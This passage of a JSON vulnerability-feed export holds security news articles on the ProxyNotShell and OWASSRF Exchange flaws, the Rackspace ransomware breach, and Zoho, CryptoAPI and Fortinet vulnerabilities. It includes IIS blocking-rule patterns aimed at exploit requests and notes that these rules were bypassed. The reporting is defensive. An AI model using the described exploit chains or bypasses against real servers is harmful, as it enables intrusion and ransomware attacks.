"HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-08T05:13:00", "type": "thn", "title": "Microsoft Issues Improved Mitigations for Unpatched Exchange Server Vulnerabilities", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-10-10T03:51:40", "id": "THN:8200D2C2E1DD329D680C5E699177551B", "href": "https://thehackernews.com/2022/10/microsoft-issues-improved-mitigations.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-01T06:04:28", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhgl2CxdfICXD4YylZ3fmq7SfJser8j-42cMqU2vbSAzyQPe4aSApGawM37IvHE5L5BynSmtvS5oS0W37yOuR2b0ADOCJOYaxGMQw4b-7y_tf3n-L3iYrYCIZPkpyGA0JtfdssxXvGwCr54-CPt4mdR96xiq5tuxt8FFVPA2JX3PSijoskfmmIYDwNS/s728-e100/microsoft-exchange-hacking.jpg>)\n\nMicrosoft officially disclosed it investigating two zero-day security vulnerabilities impacting Exchange Server 2013, 2016, and 2019 following [reports of in-the-wild exploitation](<https://thehackernews.com/2022/09/warning-new-unpatched-microsoft.html>).\n\n\"The first vulnerability, identified as [CVE-2022-41040](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41040>), is a Server-Side Request Forgery ([SSRF](<https://en.wikipedia.org/wiki/Server-side_request_forgery>)) vulnerability, while the second, identified as [CVE-2022-41082](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41082>), allows remote code execution (RCE) when PowerShell is accessible to the attacker,\" the tech giant [said](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>).\n\nThe company also confirmed that it's aware of \"limited targeted attacks\" weaponizing the flaws to obtain initial access to targeted systems, but emphasized that authenticated access to the vulnerable Exchange Server is required to achieve successful exploitation.\n\nThe attacks detailed by Microsoft show that the two flaws are stringed together in an exploit chain, with the SSRF bug enabling an authenticated adversary to remotely trigger arbitrary code execution.\n\nThe Redmond-based company further emphasized that it's working on an \"accelerated timeline\" to push a fix, while urging on premises Microsoft Exchange customers to add a blocking rule in IIS Manager as a temporary workaround to mitigate potential threats.\n\nIt's worth noting that Microsoft Exchange Online Customers are not affected. The steps to add the blocking rule are as follows -\n\n 1. Open the IIS Manager\n 2. Expand the Default Web Site\n 3. Select Autodiscover\n 4. In the Feature View, click URL Rewrite\n 5. In the Actions pane on the right-hand side, click Add Rules\n 6. Select Request Blocking and click OK\n 7. Add String \".*autodiscover\\\\.json.*\\@.*Powershell.*\" (excluding quotes) and click OK\n 8. Expand the rule and select the rule with the Pattern \".*autodiscover\\\\.json.*\\@.*Powershell.*\" and click Edit under Conditions\n 9. Change the condition input from {URL} to {REQUEST_URI}\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {}, "published": "2022-09-30T09:01:00", "type": "thn", "title": "Microsoft Confirms 2 New Exchange Zero-Day Flaws Being Used in the Wild", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-10-01T05:48:11", "id": "THN:6B72050A86FFDCE9A0B2CF6F44293A1B", "href": "https://thehackernews.com/2022/09/microsoft-confirms-2-new-exchange-zero.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-06T06:04:52", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEi9curQBhNNFXVb7VMBAzdw4XqdlsRjjQO1TKoTP_j324ubmIjk9pqa624KRULI6wr62I5mCw6kwv5V7wAOuLszOF38jRdG5L0uMRGSF_wbY7B8Tf8xxuDiq7vHa3JRrFkp9bwK0s3z3LdKaWNgmAED48clrraRNSd-7DXt9XvTyxpt1PFJ0gS6hRc6/s728-e100/ms.jpg>)\n\nMicrosoft has revised its mitigation measures for the newly disclosed and actively exploited zero-day flaws in Exchange Server after it was found that they could be trivially bypassed.\n\nThe two vulnerabilities, tracked as CVE-2022-41040 and CVE-2022-41082, have been codenamed [ProxyNotShell](<https://thehackernews.com/2022/10/state-sponsored-hackers-likely.html>) due to similarities to another set of flaws called [ProxyShell](<https://thehackernews.com/2021/11/hackers-exploiting-proxylogon-and.html>), which the tech giant resolved last year.\n\nIn-the-wild attacks abusing the [shortcomings](<https://kb.cert.org/vuls/id/915563>) have chained the two flaws to gain remote code execution on compromised servers with elevated privileges, leading to the deployment of web shells.\n\nThe Windows maker, which is yet to release a fix for the bugs, has acknowledged that a single state-sponsored threat actor may have been weaponizing the flaws since August 2022 in limited targeted attacks.\n\nIn the meantime, the company has made available temporary workarounds to reduce the risk of exploitation by restricting known attack patterns through a rule in the IIS Manager.\n\nHowever, according to security researcher Jang ([@testanull](<https://twitter.com/testanull/status/1576774007826718720>)), the URL pattern can be easily circumvented, with senior vulnerability analyst Will Dormann [noting](<https://twitter.com/wdormann/status/1576922677675102208>) that the block mitigations are \"unnecessarily precise, and therefore insufficient.\"\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhpQsLFSw9UR9_SvNk6WQy9mwfkRcm3XlnjHABkGcn5zq8dy9nknbIRrBwkrbf_VJJvMMFLN_mUcYz8qvRkQqQsJzX0ofT7lPbRq_quwfXfFCfXjlRkKZNj3efBVbrnrgJU3Vi2386QzY6BgMNCEjLdFXD3_yuvqsRn6KGIxA6muukpIgnj2Cmxv06P/s728-e100/ms.jpg>)\n\nMicrosoft has since [revised](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) the URL Rewrite rule (also available as a standalone [PowerShell script](<https://microsoft.github.io/CSS-Exchange/Security/EOMTv2/>)) to take this into account -\n\n * Open IIS Manager\n * Select Default Web Site\n * In the Feature View, click URL Rewrite\n * In the Actions pane on the right-hand side, click Add Rule(s)\u2026\n * Select Request Blocking and click OK\n * Add the string \".*autodiscover\\\\.json.*Powershell.*\" (excluding quotes)\n * Select Regular Expression under Using\n * Select Abort Request under How to block and then click OK\n * Expand the rule and select the rule with the pattern: .*autodiscover\\\\.json.*Powershell.* and click Edit under Conditions\n * Change the Condition input from {URL} to {REQUEST_URI}\n\nIt's not immediately clear when Microsoft plans to push a patch for the two vulnerabilities, but it's possible that they could be shipped as part of Patch Tuesday updates next week on October 11, 2022.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-05T05:31:00", "type": "thn", "title": "Mitigation for Exchange Zero-Days Bypassed! Microsoft Issues New Workarounds", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-10-06T04:57:27", "id": "THN:5293CFD6ACCF7BFD2EDDE976C7C06C15", "href": "https://thehackernews.com/2022/10/mitigation-for-exchange-zero-days.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-12-22T04:09:51", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhTLGmaNN3OFFmSILTclxE-UymYSclEFgrwvp76liyrsFGtPk5wpNGVl-AXdppW10UvY5aPmtLoqkxVC3ifpEx9XH3JarmYqPPQtscOXnAMl0K3lHF2nV6pcyicT2bu5U9BbJFd6hbBBVHswmATwzgzQEMc6GEUPcs4-k1yW0cjoEdfsN0LDRvVh5Ty/s728-e100/email-hacking.png>)\n\nThreat actors affiliated with a ransomware strain known as Play are leveraging a never-before-seen exploit chain that bypasses blocking rules for ProxyNotShell flaws in Microsoft Exchange Server to achieve remote code execution (RCE) through Outlook Web Access ([OWA](<https://en.wikipedia.org/wiki/Outlook_on_the_web>)).\n\n\"The new exploit method bypasses [URL rewrite mitigations](<https://thehackernews.com/2022/10/microsoft-issues-improved-mitigations.html>) for the [Autodiscover endpoint](<https://learn.microsoft.com/en-us/exchange/architecture/client-access/autodiscover>),\" CrowdStrike researchers Brian Pitchford, Erik Iker, and Nicolas Zilio [said](<https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/>) in a technical write-up published Tuesday.\n\nPlay ransomware, which first surfaced in June 2022, has been [revealed](<https://www.trendmicro.com/en_us/research/22/i/play-ransomware-s-attack-playbook-unmasks-it-as-another-hive-aff.html>) to adopt many tactics employed by other ransomware families such as [Hive](<https://thehackernews.com/2022/11/hive-ransomware-attackers-extorted-100.html>) and [Nokoyawa](<https://www.trendmicro.com/en_us/research/22/c/nokoyawa-ransomware-possibly-related-to-hive-.html>), the latter of which [upgraded to Rust](<https://www.zscaler.com/blogs/security-research/nokoyawa-ransomware-rust-or-bust>) in September 2022.\n\nThe cybersecurity company's investigations into several Play ransomware intrusions found that initial access to the target environments was not achieved by directly exploiting [CVE-2022-41040](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41040>), but rather through the OWA endpoint.\n\nDubbed **OWASSRF**, the technique likely takes advantage of another critical flaw tracked as [CVE-2022-41080](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-41080>) (CVSS score: 8.8) to achieve privilege escalation, followed by abusing [CVE-2022-41082](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41082>) for remote code execution.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEh59pwm9Kxv252Uv99amN02oXTHDo8okfVqDQEPqxZy2wZk0tCTHx16xDzABz2QYvABQfBENatlbN2owTSezPh4jYOK-0bGPr_JyWKUPsX1nnLeX5X9za6Rfk5c-juoJI5Q9NT97ANp9X64VSnb_EWUp5s1jYoZJap_uzgruqlI0kYKYqqtMvM5hZQm/s728-e100/email-security.png>)\n\nIt's worth noting that both CVE-2022-41040 and CVE-2022-41080 stem from a case of server-side request forgery ([SSRF](<https://owasp.org/www-community/attacks/Server_Side_Request_Forgery>)), which permits an attacker to access unauthorized internal resources, in this case the [PowerShell remoting](<https://learn.microsoft.com/en-us/powershell/exchange/exchange-management-shell>) service.\n\nCrowdStrike said the successful initial access enabled the adversary to drop legitimate Plink and AnyDesk executables to maintain persistent access as well as take steps to purge Windows Event Logs on infected servers to conceal the malicious activity.\n\nAll three vulnerabilities were addressed by Microsoft as part of its [Patch Tuesday updates](<https://thehackernews.com/2022/11/install-latest-windows-update-asap.html>) for November 2022. It's, however, unclear if CVE-2022-41080 was actively exploited as a zero-day alongside CVE-2022-41040 and CVE-2022-41082.\n\nThe Windows maker, for its part, has tagged CVE-2022-41080 with an \"Exploitation More Likely\" assessment, implying it's possible for an attacker to create exploit code that could be utilized to reliably weaponize the flaw.\n\nCrowdStrike further noted that a proof-of-concept (PoC) Python script [discovered](<https://twitter.com/Purp1eW0lf/status/1602989967776808961>) and leaked by Huntress Labs researcher Dray Agha last week may have been put to use by the Play ransomware actors for initial access.\n\nThis is evidenced by the fact that the execution of the Python script made it possible to \"replicate the logs generated in recent Play ransomware attacks.\"\n\n\"Organizations should apply the November 8, 2022 patches for Exchange to prevent exploitation since the URL rewrite mitigations for ProxyNotShell are not effective against this exploit method,\" the researchers said.\n\n \n\n\nFound this article interesting? Follow us on [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-12-21T07:41:00", "type": "thn", "title": "Ransomware Hackers Using New Way to Bypass MS Exchange ProxyNotShell Mitigations", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41080", "CVE-2022-41082"], "modified": "2022-12-22T03:36:49", "id": "THN:DF2B360775F2B7F0C76A360FDA254FBA", "href": "https://thehackernews.com/2022/12/ransomware-hackers-using-new-way-to.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-01-07T18:11:10", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhIkYkTBU5KJGFe1OgGLpYygDiWxeko_-avcEdQlausI60efbG2CTSjXoushTX82kWSNdNGwqru9TyK8Ohoh9Af2DlFFuzSZEDV0NH_rRPaEYUi86D_fRS5OutucQG2fb-8zydnRbryW1mN5kn5PUKySHDQ1UTPRbRWn1T-eB2NPm0Jh80Md9edRKdq/s728-rj-e365/rackspace-breach.png>)\n\nCloud services provider Rackspace on Thursday confirmed that the ransomware gang known as **Play** was responsible for last month's breach.\n\nThe security incident, which took place on December 2, 2022, leveraged a previously unknown security exploit to gain initial access to the Rackspace Hosted Exchange email environment.\n\n\"This zero-day exploit is associated with [CVE-2022-41080](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-41080>),\" the Texas-based company [said](<https://status.apps.rackspace.com/index/viewincidents?group=2>). \"Microsoft disclosed CVE-2022-41080 as a privilege escalation vulnerability and did not include notes for [it] being part of a remote code execution chain that was exploitable.\"\n\nRackspace's forensic investigation found that the threat actor accessed the Personal Storage Table ([.PST](<https://en.wikipedia.org/wiki/Personal_Storage_Table>)) of 27 customers out of a total of nearly 30,000 customers on the Hosted Exchange email environment.\n\nHowever, the company said there is no evidence the adversary viewed, misused, or distributed the customer's emails or data from those personal storage folders. It further said it intends to retire its Hosted Exchange platform as part of a planned migration to Microsoft 365.\n\nIt's not currently not known if Rackspace paid a ransom to the cybercriminals, but the disclosure follows a report from CrowdStrike last month that shed light on the new technique, dubbed [OWASSRF](<https://thehackernews.com/2022/12/ransomware-hackers-using-new-way-to.html>), employed by the Play ransomware actors.\n\nThe mechanism targets Exchange servers that are unpatched against the ProxyNotShell vulnerabilities ([CVE-2022-41040](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41040>) and [CVE-2022-41082](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41082>)) but have in place URL rewrite mitigations for the Autodiscover endpoint.\n\nThis involves an exploit chain comprising CVE-2022-41080 and CVE-2022-41082 to achieve remote code execution in a manner that bypasses the blocking rules through Outlook Web Access (OWA). The flaws were addressed by Microsoft in November 2022.\n\nThe Windows maker, in a statement shared with The Hacker News, urged customers to prioritize installing its [November 2022 Exchange Server updates](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-november-2022-exchange-server-security-updates/ba-p/3669045>) and noted that the reported method targets vulnerable systems that have not applied the latest fixes.\n\n \n\n\nFound this article interesting? Follow us on [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-06T09:01:00", "type": "thn", "title": "Rackspace Confirms Play Ransomware Gang Responsible for Recent Breach", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41080", "CVE-2022-41082"], "modified": "2023-01-07T17:47:30", "id": "THN:A356406D6A8ADF4F4592DBAAEB6CDA74", "href": "https://thehackernews.com/2023/01/rackspace-confirms-play-ransomware-gang.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-09-26T06:04:20", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEi3lAG-_AQkLIeTAck69hwfthXZL2c_CCkp1M9-dTB-jESfXRkBYWad1oJ2D75-1IyOKeVSOMEh4-0XFNz60_5RCj9TV2y0WOgrlicb3hXYF5LInbkd_cPtjB6F8C8l9WKX2DB8j3F4vMQ1MhmlbFo_qauyWrNaoa60btnMdP6NjVyKEMBcZwHyr5U-/s728-e100/zoho.jpg>)\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday [added](<https://www.cisa.gov/uscert/ncas/current-activity/2022/09/22/cisa-has-added-one-known-exploited-vulnerability-catalog>) a recently disclosed security flaw in Zoho ManageEngine to its Known Exploited Vulnerabilities ([KEV](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>)) Catalog, citing evidence of active exploitation.\n\n\"Zoho ManageEngine PAM360, Password Manager Pro, and Access Manager Plus contain an unspecified vulnerability which allows for remote code execution,\" the agency said in a notice.\n\nThe [critical vulnerability](<https://www.manageengine.com/products/passwordmanagerpro/advisory/rce.html>), tracked as [CVE-2022-35405](<https://nvd.nist.gov/vuln/detail/CVE-2022-35405>), is rated 9.8 out of 10 for severity on the CVSS scoring system, and was patched by Zoho as part of updates released on June 24, 2022.\n\nAlthough the exact nature of the flaw remains unknown, the India-based enterprise solutions company [said](<https://www.manageengine.com/products/passwordmanagerpro/advisory/cve-2022-35405.html>) it addressed the issue by removing the vulnerable components that could lead to the remote execution of arbitrary code.\n\nZoho has also warned of the public availability of a proof-of-concept (PoC) exploit for the vulnerability, making it imperative that customers move quickly to upgrade the instances of Password Manager Pro, PAM360 and Access Manager Plus as soon as possible.\n\nThe cybersecurity agency did not share additional specifics on how the flaw is being weaponized and how widespread the exploitation efforts are, but data gathered by GreyNoise shows that [in-the-wild attacks](<https://viz.greynoise.io/tag/zoho-password-manager-pro-xml-rpc-rce-attempt?days=30>) were detected on September 7, 2022.\n\nIn light of active exploitation of the vulnerability, Federal Civilian Executive Branch (FCEB) agencies are required to apply the vendor-provided patches by October 13, 2022.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-23T10:21:00", "type": "thn", "title": "CISA Warns of Hackers Exploiting Recent Zoho ManageEngine Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-35405"], "modified": "2022-09-26T04:47:39", "id": "THN:8EF2325CBAF6720C51D9798925FE61A0", "href": "https://thehackernews.com/2022/09/cisa-warns-of-hackers-exploiting-recent.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-01-26T14:54:35", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgcCIe1V0XFCm5Bcxm4oxeESEi7u-U52a_r1gvOT1QWGgTGPz-7Ap6qFHJU_aV6-S0Gg0l9Cd1648pkwizssbGHB82JaNxi0t8qfAoqjDkfqZgQW7r7udl0MPOhFBB9CJ8EI0cdUV0uW7OSFXH999jj1SG4oolZJyGXVnFi45vRhNS0dKUVJNN0CYD4/s728-rj-e365/poc-exploit.png>)\n\nProof-of-concept (Poc) code has been released for a now-patched high-severity security flaw in the Windows CryptoAPI that the U.S. National Security Agency (NSA) and the U.K. National Cyber Security Centre (NCSC) reported to Microsoft last year.\n\nTracked as **CVE-2022-34689** (CVSS score: 7.5), the spoofing vulnerability was addressed by the tech giant as part of Patch Tuesday updates released in August 2022, but was only publicly disclosed two months later on October 11, 2022.\n\n\"An attacker could manipulate an existing public [x.509 certificate](<https://en.wikipedia.org/wiki/X.509>) to spoof their identity and perform actions such as authentication or code signing as the targeted certificate,\" Microsoft [said](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-34689>) in an advisory released at the time.\n\nThe [Windows CryptoAPI](<https://learn.microsoft.com/en-us/windows/win32/seccrypto/cryptoapi-system-architecture>) offers an interface for developers to add cryptographic services such as encryption/decryption of data and authentication using digital certificates to their applications.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEitgEFWKe9cmmPiCeNUFeUHkiQrOP1gUF8DKPscD6rnc5kzIBJ6dfhlEIMJw7FQRTLYapnN-A4XYC5HJJTJPiGRHlJszCPjxLdiwYvHwlJxEdt4f1-pt1O3DmHY3xcTeKNtRz15wmRh-nHbvtkF69Sal7AuOAzPFA0X5TbYWWfhYuBZrWu1hW0fQC8p/s728-rj-e365/exploit.gif>)\n\nWeb security company Akamai, which [released](<https://github.com/akamai/akamai-security-research/tree/main/PoCs/CVE-2022-34689>) the PoC, [said](<https://www.akamai.com/blog/security-research/exploiting-critical-spoofing-vulnerability-microsoft-cryptoapi>) CVE-2022-34689 is rooted in the fact that the vulnerable piece of code that's designed to accept an x.509 certificate carried out a check that solely relied on the certificate's MD5 fingerprint.\n\nMD5, a message-digest algorithm used for hashing, is essentially [cryptographically broken](<https://thehackernews.com/2022/11/french-electricity-provider-fined-for.html>) as of December 2008 owing to the risk of [birthday attacks](<https://en.wikipedia.org/wiki/Birthday_attack>), a cryptanalytic method used to find collisions in a hash function.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgTx8Y1pP9dX_Xbmq-NThHnkUQ4XTBB94Koai70cWynk-zlzM1DDDAvb_Rq39ihlv9aiKFa7pxmZFFpzPriB4M8DX9TxFNxTKQdGantkStEOsaIgxgCAMIZz7nCxnt0DHi_5MMRAewgryohrF6u3oHCeCQIiAspBmDqucgAIE6Vf15T1JF9BmPB_2Ig/s728-rj-e365/exploit.png>)\n\nThe net effect of this shortcoming is that it opens the door for a bad actor to serve a modified version of a legitimate certificate to a victim app, and then create a new certificate whose MD5 hash collides with the rigged certificate and use it to masquerade as the original entity.\n\nIn other words, the flaw could be weaponized by a rogue interloper to stage a mallory-in-the-middle ([MitM](<https://en.wikipedia.org/wiki/Man-in-the-middle_attack>)) attack and redirect users relying on an old version of Google Chrome (version 48 and earlier) to an arbitrary website of the actor's choosing simply because the susceptible version of the web browser trusts the malicious certificate.\n\n\"Certificates play a major role in identity verification online, making this vulnerability lucrative for attackers,\" Akamai said.\n\nAlthough the flaw has a limited scope, the Massachusetts-headquartered firm pointed out \"there is still a lot of code that uses this API and might be exposed to this vulnerability, warranting a patch even for discontinued versions of Windows, like Windows 7.\"\n\n \n\n\nFound this article interesting? Follow us on [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2023-01-26T14:52:00", "type": "thn", "title": "Researchers Release PoC Exploit for Windows CryptoAPI Bug Discovered by NSA", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-34689"], "modified": "2023-01-26T14:52:17", "id": "THN:40CDBC6B017F89BD673FA2F8C3CA1B06", "href": "https://thehackernews.com/2023/01/researchers-release-poc-exploit-for.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-08T06:05:02", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgUpWG06oQBFeajW6L5ubkRQaF_egVO055QAFtAnZuJhcqX-7Hp0RlTozLKtDquowAcvtMzOiQaqGJ8M9_OvPtcyOEx_nVvW6wAwhLHDCoKtZlKBccJcJNmsWBh_7Ogs3FsRTQwdrEc4S_K8-SPfQue17uZKD35uoCXNo8er4_244-8ktu_z7bQdH0t/s728-e100/Fortinet-zero-day.jpg>)\n\nFortinet has privately warned its customers of a security flaw affecting FortiGate firewalls and FortiProxy web proxies that could potentially allow an attacker to perform unauthorized actions on susceptible devices.\n\nTracked as **CVE-2022-40684** (CVSS score: 9.6), the critical flaw relates to an [authentication bypass vulnerability](<https://twitter.com/Gi7w0rm/status/1578299492822003712>) that may permit an unauthenticated adversary to carry out arbitrary operations on the administrative interface via a specially crafted HTTP(S) request.\n\nThe issue impacts the following versions, and has been addressed in FortiOS versions [7.0.7](<https://docs.fortinet.com/document/fortigate/7.0.7/fortios-release-notes/289806/resolved-issues>) and [7.2.2](<https://docs.fortinet.com/document/fortigate/7.2.2/fortios-release-notes/289806/resolved-issues>), and FortiProxy versions [7.0.7](<https://docs.fortinet.com/document/fortiproxy/7.0.7/release-notes/534553/resolved-issues>) and [7.2.1](<https://docs.fortinet.com/document/fortiproxy/7.2.1/release-notes/534553/resolved-issues>) released this week:\n\n * FortiOS - From 7.0.0 to 7.0.6 and from 7.2.0 to 7.2.1\n * FortiProxy - From 7.0.0 to 7.0.6 and 7.2.0\n\n\"Due to the ability to exploit this issue remotely, Fortinet is strongly recommending all customers with the vulnerable versions to perform an immediate upgrade,\" the company [cautioned](<https://twitter.com/Gi7w0rm/status/1578305143530848256>) in an alert shared by a security researcher who goes by the alias Gitworm on Twitter.\n\nAs temporary workarounds, the company is recommending users to disable internet-facing HTTPS Administration until the upgrades can be put in place, or alternatively, enforce a firewall policy to \"[local-in traffic](<https://community.fortinet.com/t5/FortiGate/Technical-Tip-Local-traffic-logs-and-policy-ID-0/ta-p/196654>).\"\n\nWhen reached for a comment, Fortinet acknowledged the advisory and noted that it's delaying public notice until its customers have applied the fixes.\n\n\"Timely and ongoing communications with our customers is a key component in our efforts to best protect and secure their organization,\" the company said in a statement shared with The Hacker News. \"Customer communications often detail the most up-to-date guidance and recommended next steps to best protect and secure their organization.\"\n\n\"There are instances where confidential advance customer communications can include early warning on advisories to enable customers to further strengthen their security posture, which then will be publicly released in the coming days to a broader audience. The security of our customers is our first priority.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {}, "published": "2022-10-07T16:47:00", "type": "thn", "title": "Fortinet Warns of New Auth Bypass Flaw Affecting FortiGate and FortiProxy", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-40684"], "modified": "2022-10-08T04:39:51", "id": "THN:FCEF4EA34B53C743863FE92365E26AFF", "href": "https://thehackernews.com/2022/10/fortinet-warns-of-new-auth-bypass-flaw.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-04T12:04:40", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEh6538WifO-pQPlUhACBuUX_jTbrSpW305DDSQv2XtGhWolinz3L4Hgy3yckiql7NJG9L9tFcb9ZFIPr1a1yBf9bvlyuXOAhhxdrgegxaIMeSIxRzX7JFkUbAULNHo8UzppH76EuY77JOotsyc1FYph-TCqk5DAr4GPj--2TvKuoLT8Tucw6ssJeCOa/s728-e100/proxynotshell.jpg>)\n\nNicknamed ProxyNotShell, a new exploit used in the wild takes advantage of the recently published Microsoft Server-Side Request Forgery (SSRF) vulnerability CVE-2022-41040 and a second vulnerability, CVE-2022-41082 that allows Remote Code Execution (RCE) when PowerShell is available to unidentified attackers.\n\nBased on ProxyShell, this new zero-day abuse risk leverage a chained attack similar to the one used in the 2021 ProxyShell attack that exploited the combination of multiple vulnerabilities - CVE-2021-34523, CVE-2021-34473, and CVE-2021-31207 \u2013 to permit a remote actor to execute arbitrary code.\n\nDespite the potential severity of attacks using them, ProxyShell vulnerabilities are still on CISA's list of top 2021 routinely exploited vulnerabilities.\n\n## Meet ProxyNotShell \n\nRecorded on September 19, 2022, CVE-2022-41082 is an attack vector targeting Microsoft's Exchange Servers, enabling attacks of low complexity with low privileges required. Impacted services, if vulnerable, enable an authenticated attacker to compromise the underlying exchange server by leveraging existing exchange PowerShell, which could result in a full compromise.\n\nWith the help of CVE-2022-41040, another Microsoft vulnerability also recorded on September 19, 2022, an attacker can remotely trigger CVE-2022-41082 to remotely execute commands.\n\nThough a user needs to have the privilege to access 